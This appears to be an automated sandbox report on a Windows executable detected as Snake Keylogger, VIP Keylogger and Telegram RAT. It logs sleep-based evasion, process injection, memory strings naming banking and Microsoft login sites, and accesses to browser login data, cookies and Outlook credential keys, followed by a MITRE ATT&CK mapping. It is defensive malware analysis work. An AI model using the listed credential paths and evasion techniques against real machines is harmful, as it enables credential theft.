Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597295s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599747	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599372	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597295	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3795110328.00000000011D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Code function: 3_2_06A49668 LdrInitializeThunk,

3_2_06A49668

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Memory written: C:\Users\user\Desktop\n8l3NmC5EH.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Users\user\Desktop\n8l3NmC5EH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Users\user\Desktop\n8l3NmC5EH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
